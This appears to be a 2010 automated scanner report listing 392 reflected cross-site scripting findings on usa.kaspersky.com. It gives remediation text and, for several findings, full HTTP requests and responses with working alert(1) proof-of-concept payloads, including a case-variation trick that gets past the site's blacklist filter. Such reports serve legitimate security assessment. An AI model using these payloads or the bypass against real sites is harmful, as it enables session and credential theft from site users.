1.352. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 1]

1.353. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 1]

1.354. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 2]

1.355. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 2]

1.356. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 3]

1.357. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/imagecache/box_shot_extra_small_78px/KMS9 [REST URL parameter 3]

1.358. http://usa.kaspersky.com/store/december-special-offer [REST URL parameter 1]

1.359. http://usa.kaspersky.com/store/december-special-offer [REST URL parameter 1]

1.360. http://usa.kaspersky.com/store/december-special-offer [REST URL parameter 2]

1.361. http://usa.kaspersky.com/store/december-special-offer [REST URL parameter 2]

1.362. http://usa.kaspersky.com/store/kaspersky-business-software [REST URL parameter 1]

1.363. http://usa.kaspersky.com/store/kaspersky-business-software [REST URL parameter 1]

1.364. http://usa.kaspersky.com/store/kaspersky-business-software [REST URL parameter 2]

1.365. http://usa.kaspersky.com/store/kaspersky-business-software [REST URL parameter 2]

1.366. http://usa.kaspersky.com/store/kaspersky-business-software [name of an arbitrarily supplied request parameter]

1.367. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 1]

1.368. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 1]

1.369. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 2]

1.370. http://usa.kaspersky.com/store/kaspersky-store [REST URL parameter 2]

1.371. http://usa.kaspersky.com/store/kaspersky-store [name of an arbitrarily supplied request parameter]

1.372. http://usa.kaspersky.com/store/product-upgrades [REST URL parameter 1]

1.373. http://usa.kaspersky.com/store/product-upgrades [REST URL parameter 1]

1.374. http://usa.kaspersky.com/store/product-upgrades [REST URL parameter 2]

1.375. http://usa.kaspersky.com/store/product-upgrades [REST URL parameter 2]

1.376. http://usa.kaspersky.com/store/product-upgrades [name of an arbitrarily supplied request parameter]

1.377. http://usa.kaspersky.com/store/specialoffer [REST URL parameter 1]

1.378. http://usa.kaspersky.com/store/specialoffer [REST URL parameter 1]

1.379. http://usa.kaspersky.com/store/specialoffer [REST URL parameter 2]

1.380. http://usa.kaspersky.com/store/specialoffer [REST URL parameter 2]

1.381. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1]

1.382. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1]

1.383. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2]

1.384. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2]

1.385. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3]

1.386. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3]

1.387. http://usa.kaspersky.com/take-back-the-endpoint [REST URL parameter 1]

1.388. http://usa.kaspersky.com/take-back-the-endpoint [REST URL parameter 1]

1.389. http://usa.kaspersky.com/take-back-the-endpoint [name of an arbitrarily supplied request parameter]

1.390. http://usa.kaspersky.com/windows7 [REST URL parameter 1]

1.391. http://usa.kaspersky.com/windows7 [REST URL parameter 1]

1.392. http://usa.kaspersky.com/windows7 [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 392 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a61"><script>alert(1)</script>0cb84d29114 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?69a61"><script>alert(1)</script>0cb84d29114=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_nr=1292640962589-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292640884.1; __utmc=205612169

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:07:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684876"
Content-Type: text/html; charset=utf-8
Content-Length: 41041
Date: Sat, 18 Dec 2010 15:08:04 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?69a61"><script>alert(1)</script>0cb84d29114=1" />
...[SNIP]...

1.2. http://usa.kaspersky.com/about-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b670b"-alert(1)-"8734309cf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-usb670b"-alert(1)-"8734309cf6a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685572"
Content-Type: text/html; charset=utf-8
Content-Length: 30000
Date: Sat, 18 Dec 2010 15:19:45 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usb670b"-alert(1)-"8734309cf6a";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.3. http://usa.kaspersky.com/about-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb7a"><script>alert(1)</script>d378bc6f04d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-usddb7a"><script>alert(1)</script>d378bc6f04d HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685550"
Content-Type: text/html; charset=utf-8
Content-Length: 30097
Date: Sat, 18 Dec 2010 15:19:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-usddb7a"><script>alert(1)</script>d378bc6f04d" />
...[SNIP]...

1.4. http://usa.kaspersky.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c2b"><script>alert(1)</script>0e82cd1af2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us?c2c2b"><script>alert(1)</script>0e82cd1af2c=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:17:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685437"
Content-Type: text/html; charset=utf-8
Content-Length: 32529
Date: Sat, 18 Dec 2010 15:17:26 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us?c2c2b"><script>alert(1)</script>0e82cd1af2c=1" />
...[SNIP]...

1.5. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7e6c</script><ScRiPt>alert(1)</ScRiPt>1b0d3ec6fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-usf7e6c</script><ScRiPt>alert(1)</ScRiPt>1b0d3ec6fd1/contact-us HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:23:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685831"
Content-Type: text/html; charset=utf-8
Content-Length: 30203
Date: Sat, 18 Dec 2010 15:23:56 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usf7e6c</script><ScRiPt>alert(1)</ScRiPt>1b0d3ec6fd1/contact-us";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.6. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d6d"><ScRiPt>alert(1)</ScRiPt>c182eed6a9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-us20d6d"><ScRiPt>alert(1)</ScRiPt>c182eed6a9b/contact-us HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685757"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:22:43 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us20d6d"><ScRiPt>alert(1)</ScRiPt>c182eed6a9b/contact-us" />
...[SNIP]...

1.7. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b51"><ScRiPt>alert(1)</ScRiPt>845d47c9c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-us/contact-us74b51"><ScRiPt>alert(1)</ScRiPt>845d47c9c06 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685905"
Content-Type: text/html; charset=utf-8
Content-Length: 30227
Date: Sat, 18 Dec 2010 15:25:07 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us74b51"><ScRiPt>alert(1)</ScRiPt>845d47c9c06" />
...[SNIP]...

1.8. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80ded</script><ScRiPt>alert(1)</ScRiPt>5de07cdb828 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-us/contact-us80ded</script><ScRiPt>alert(1)</ScRiPt>5de07cdb828 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685940"
Content-Type: text/html; charset=utf-8
Content-Length: 30267
Date: Sat, 18 Dec 2010 15:25:44 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
p4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/contact-us80ded</script><ScRiPt>alert(1)</ScRiPt>5de07cdb828";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.9. http://usa.kaspersky.com/about-us/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 993e7"><script>alert(1)</script>11100f21416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/contact-us?993e7"><script>alert(1)</script>11100f21416=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685567"
Content-Type: text/html; charset=utf-8
Content-Length: 40430
Date: Sat, 18 Dec 2010 15:19:42 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us?993e7"><script>alert(1)</script>11100f21416=1" />
...[SNIP]...

1.10. http://usa.kaspersky.com/about-us/press-center [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/press-center

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e85"><ScRiPt>alert(1)</ScRiPt>b8324495d5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-usf2e85"><ScRiPt>alert(1)</ScRiPt>b8324495d5a/press-center HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685921"
Content-Type: text/html; charset=utf-8
Content-Length: 30175
Date: Sat, 18 Dec 2010 15:25:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-usf2e85"><ScRiPt>alert(1)</ScRiPt>b8324495d5a/press-center" />
...[SNIP]...

1.11. http://usa.kaspersky.com/about-us/press-center [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/press-center

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd464"-alert(1)-"fccdc794098 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-uscd464"-alert(1)-"fccdc794098/press-center HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
